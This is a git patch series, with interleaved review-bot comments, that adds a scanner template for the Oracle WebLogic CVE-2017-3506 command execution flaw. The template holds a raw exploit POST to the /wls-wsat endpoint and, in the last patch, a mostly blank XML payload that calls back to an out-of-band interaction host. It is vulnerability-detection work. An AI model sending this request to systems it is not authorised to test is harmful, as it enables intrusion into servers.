From 6eae4191d69b15da5e1b5565c52005ebfbc51498 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 26 Apr 2021 15:18:57 +0530
Subject: [PATCH 1/4] Added CVE-2017-3506
---
cves/2017/CVE-2017-3506.yaml | 52 ++++++++++++++++++++++++++++++++++++
1 file changed, 52 insertions(+)
create mode 100644 cves/2017/CVE-2017-3506.yaml
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
new file mode 100644
index 0000000000..3176b7ec9b
--- /dev/null
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -0,0 +1,52 @@
+id: CVE-2017-3506
+
+info:
+ name: Oracle Weblogic Remote OS Command Execution
+ author: pdteam
+ description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
+ severity: high
+ tags: cve,cve2017,weblogic,oracle,rce,oob
+ reference: |
+ - https://hackerone.com/reports/810778
+ - https://nvd.nist.gov/vuln/detail/CVE-2017-3506
+
+requests:
+ - raw:
+ - |
+ POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: text/xml
+ User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0,
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8,
+ Content-Type: text/xml;charset=UTF-8
+ Content-Length: 873
+
+
+
+
+
+
+
+
+
+
+
+
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the HTTP Interaction
+ words:
+ - "dns"
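Review bot: The raw request sets `Content-Type` twice (`text/xml`, then `text/xml;charset=UTF-8`), and the `User-Agent` and `Accept` values each end in a stray comma, so what the server parses depends on how it handles duplicate and malformed headers. Keep a single `Content-Type: text/xml;charset=UTF-8` and drop the two trailing commas. The fixed `Content-Length: 873` is also fragile: if any part of the body is templated, the declared length will not match what is sent, so I would omit the header and let the client compute it (assuming the engine does that for raw requests). The request body is not readable in this view, so this note covers the headers only.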
From 8ca815d1919ab60422d6cd14df4246cdb62f3998 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 26 Apr 2021 15:20:04 +0530
Subject: [PATCH 2/4] Update CVE-2017-3506.yaml
---
cves/2017/CVE-2017-3506.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 3176b7ec9b..5bbe72c13f 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -1,7 +1,7 @@
id: CVE-2017-3506
info:
- name: Oracle Weblogic Remote OS Command Execution
+ name: Oracle Weblogic Remote OS Command Execution
author: pdteam
description: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (Web Services). Supported versions that are affected are 10.3.6.0, 12.1.3.0, 12.2.1.0, 12.2.1.1 and 12.2.1.2. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle WebLogic Server.
severity: high
From 68b06c50a44a7c91dfc4b38f7f71fc86f5c1080b Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Mon, 26 Apr 2021 21:16:27 +0530
Subject: [PATCH 3/4] Update CVE-2017-3506.yaml
---
cves/2017/CVE-2017-3506.yaml | 2 +-
1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 5bbe72c13f..40a376d282 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -47,6 +47,6 @@ requests:
matchers:
- type: word
- part: interactsh_protocol # Confirms the HTTP Interaction
+ part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
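Review bot: The corrected comment on `part: interactsh_protocol` now agrees with the `dns` word, but it still does not say how weak that signal is. A DNS lookup of the callback name shows only that some resolver asked for it, and that resolver may belong to a proxy or inspection device in front of the target rather than to the WebLogic host. I would state this in the comment, e.g. `# DNS interaction only: name was resolved, execution on the target not confirmed`, so that a `severity: high` hit is triaged as a lead and verified against the host's patch level. The `requests` entry this matcher belongs to starts outside the hunk.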
From 641e125c79eb5328dc8192e645ce5a362b947798 Mon Sep 17 00:00:00 2001
From: sandeep <8293321+ehsandeep@users.noreply.github.com>
Date: Sun, 2 May 2021 18:51:04 +0530
Subject: [PATCH 4/4] improved payload
---
cves/2017/CVE-2017-3506.yaml | 36 ++++++++++++++----------------------
1 file changed, 14 insertions(+), 22 deletions(-)
diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml
index 40a376d282..7ccc09a393 100644
--- a/cves/2017/CVE-2017-3506.yaml
+++ b/cves/2017/CVE-2017-3506.yaml
@@ -22,28 +22,20 @@ requests:
Content-Length: 873
-
-
-
-
-
-
-
-
-
+
+
+
+
+ http://{{interactsh-url}}
+
+
+
+
+
+
+
+
+
matchers:
- type: word